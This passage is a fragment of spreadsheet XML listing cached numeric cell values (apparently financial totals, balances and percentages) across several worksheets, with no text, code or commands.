            <v>67.7083333333333</v>
          </cell>
          <cell r="P6">
            <v>62.202380952381</v>
          </cell>
          <cell r="Q6">
            <v>52.522238514174</v>
          </cell>
          <cell r="R6">
            <v>97.1692307692308</v>
          </cell>
          <cell r="S6">
            <v>83.9234449760766</v>
          </cell>
          <cell r="T6">
            <v>86.1065228618888</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>11.75</v>
          </cell>
          <cell r="M7">
            <v>78.75</v>
          </cell>
          <cell r="N7">
            <v>4101.33</v>
          </cell>
          <cell r="O7">
            <v>48.9583333333333</v>
          </cell>
          <cell r="P7">
            <v>46.875</v>
          </cell>
          <cell r="Q7">
            <v>50.1140029325513</v>
          </cell>
          <cell r="R7">
            <v>213.702127659574</v>
          </cell>
          <cell r="S7">
            <v>204.888888888889</v>
          </cell>
          <cell r="T7">
            <v>187.903923849093</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>526</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>343</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>1876</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>1053</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>200</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2719.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>278</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>2466.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>608</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2345.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1206</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5564.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>200</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>502.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2511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3998.86</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>27</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>26.107</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>312.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>284</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3402.36</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>27730.81</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8717.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="9">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>5250</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>37202.6599999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>17</v>
          </cell>
          <cell r="M6">
            <v>121.5</v>
          </cell>
          <cell r="N6">
            <v>4315.42</v>
          </cell>
          <cell r="O6">
            <v>70.8333333333333</v>
          </cell>
          <cell r="P6">
            <v>63.28125</v>
          </cell>
          <cell r="Q6">
            <v>52.5757797270955</v>
          </cell>
          <cell r="R6">
            <v>93</v>
          </cell>
          <cell r="S6">
            <v>85.1934156378601</v>
          </cell>
          <cell r="T6">
            <v>86.1336787612793</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>17.75</v>
          </cell>
          <cell r="M7">
            <v>96.5</v>
          </cell>
          <cell r="N7">
            <v>4119.08</v>
          </cell>
          <cell r="O7">
            <v>73.9583333333333</v>
          </cell>
          <cell r="P7">
            <v>50.2604166666667</v>
          </cell>
          <cell r="Q7">
            <v>50.1837231968811</v>
          </cell>
          <cell r="R7">
            <v>206.704225352113</v>
          </cell>
          <cell r="S7">
            <v>205.222797927461</v>
          </cell>
          <cell r="T7">
            <v>187.984938384299</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>140</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>43</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>1833</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>1441</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>1206</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>100</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3825.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>600</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>1866.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>1072</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>364.29</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3053.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1005</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>2000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4569.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>502.71</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>3669</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4496.14</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>162.11</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>102</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>86.217</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>336</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>282</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3878.14</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>27325.67</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9876.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="10">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2616</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>35760.9899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.75</v>
          </cell>
          <cell r="M6">
            <v>131.25</v>
          </cell>
          <cell r="N6">
            <v>4325.17</v>
          </cell>
          <cell r="O6">
            <v>40.625</v>
          </cell>
          <cell r="P6">
            <v>60.7638888888889</v>
          </cell>
          <cell r="Q6">
            <v>52.5409378036929</v>
          </cell>
          <cell r="R6">
            <v>79.5897435897436</v>
          </cell>
          <cell r="S6">
            <v>84.7771428571429</v>
          </cell>
          <cell r="T6">
            <v>86.1189271173156</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>9.75</v>
          </cell>
          <cell r="M7">
            <v>106.25</v>
          </cell>
          <cell r="N7">
            <v>4128.83</v>
          </cell>
          <cell r="O7">
            <v>40.625</v>
          </cell>
          <cell r="P7">
            <v>49.1898148148148</v>
          </cell>
          <cell r="Q7">
            <v>50.1558551992225</v>
          </cell>
          <cell r="R7">
            <v>188.717948717949</v>
          </cell>
          <cell r="S7">
            <v>203.708235294118</v>
          </cell>
          <cell r="T7">
            <v>187.986669347006</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>776</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>603</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>200</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2236</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>335</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>200</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3960.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>188</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>1678.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>300</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2753.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1742</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1126</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5185.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1840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4057.67</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>48</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>38.217</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>291.75</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>263</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3502.92</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>26147</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9613.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="11">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3117</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>34756.2399999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.75</v>
          </cell>
          <cell r="M6">
            <v>141</v>
          </cell>
          <cell r="N6">
            <v>4334.92</v>
          </cell>
          <cell r="O6">
            <v>40.625</v>
          </cell>
          <cell r="P6">
            <v>58.75</v>
          </cell>
          <cell r="Q6">
            <v>52.5062984496124</v>
          </cell>
          <cell r="R6">
            <v>78.6666666666667</v>
          </cell>
          <cell r="S6">
            <v>84.354609929078</v>
          </cell>
          <cell r="T6">
            <v>86.1021656685706</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>11.75</v>
          </cell>
          <cell r="M7">
            <v>118</v>
          </cell>
          <cell r="N7">
            <v>4140.58</v>
          </cell>
          <cell r="O7">
            <v>48.9583333333333</v>
          </cell>
          <cell r="P7">
            <v>49.1666666666667</v>
          </cell>
          <cell r="Q7">
            <v>50.1523740310078</v>
          </cell>
          <cell r="R7">
            <v>200</v>
          </cell>
          <cell r="S7">
            <v>203.338983050847</v>
          </cell>
          <cell r="T7">
            <v>188.020760376566</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>767</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>1340</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>50</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>3526</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>536</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>469</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>4027.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>50</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>1628.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>1541</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>629</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3665.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>871</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1200</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4856.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2350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4121.75</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>87.77</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>58</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>67.9870000000001</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>345</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>315</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3461.75</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25457.25</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9298.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="12">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3535</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>34212.9499999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>11.75</v>
          </cell>
          <cell r="M6">
            <v>152.75</v>
          </cell>
          <cell r="N6">
            <v>4346.67</v>
          </cell>
          <cell r="O6">
            <v>48.9583333333333</v>
          </cell>
          <cell r="P6">
            <v>57.8598484848485</v>
          </cell>
          <cell r="Q6">
            <v>52.4960144927536</v>
          </cell>
          <cell r="R6">
            <v>80.4255319148936</v>
          </cell>
          <cell r="S6">
            <v>84.0523731587561</v>
          </cell>
          <cell r="T6">
            <v>86.0868204855671</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>13</v>
          </cell>
          <cell r="M7">
            <v>131</v>
          </cell>
          <cell r="N7">
            <v>4153.58</v>
          </cell>
          <cell r="O7">
            <v>54.1666666666667</v>
          </cell>
          <cell r="P7">
            <v>49.6212121212121</v>
          </cell>
          <cell r="Q7">
            <v>50.1640096618357</v>
          </cell>
          <cell r="R7">
            <v>199.230769230769</v>
          </cell>
          <cell r="S7">
            <v>202.931297709924</v>
          </cell>
          <cell r="T7">
            <v>188.05584580049</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>945</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>134</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>114</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>3546</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>279</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3748.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>300</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>1328.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
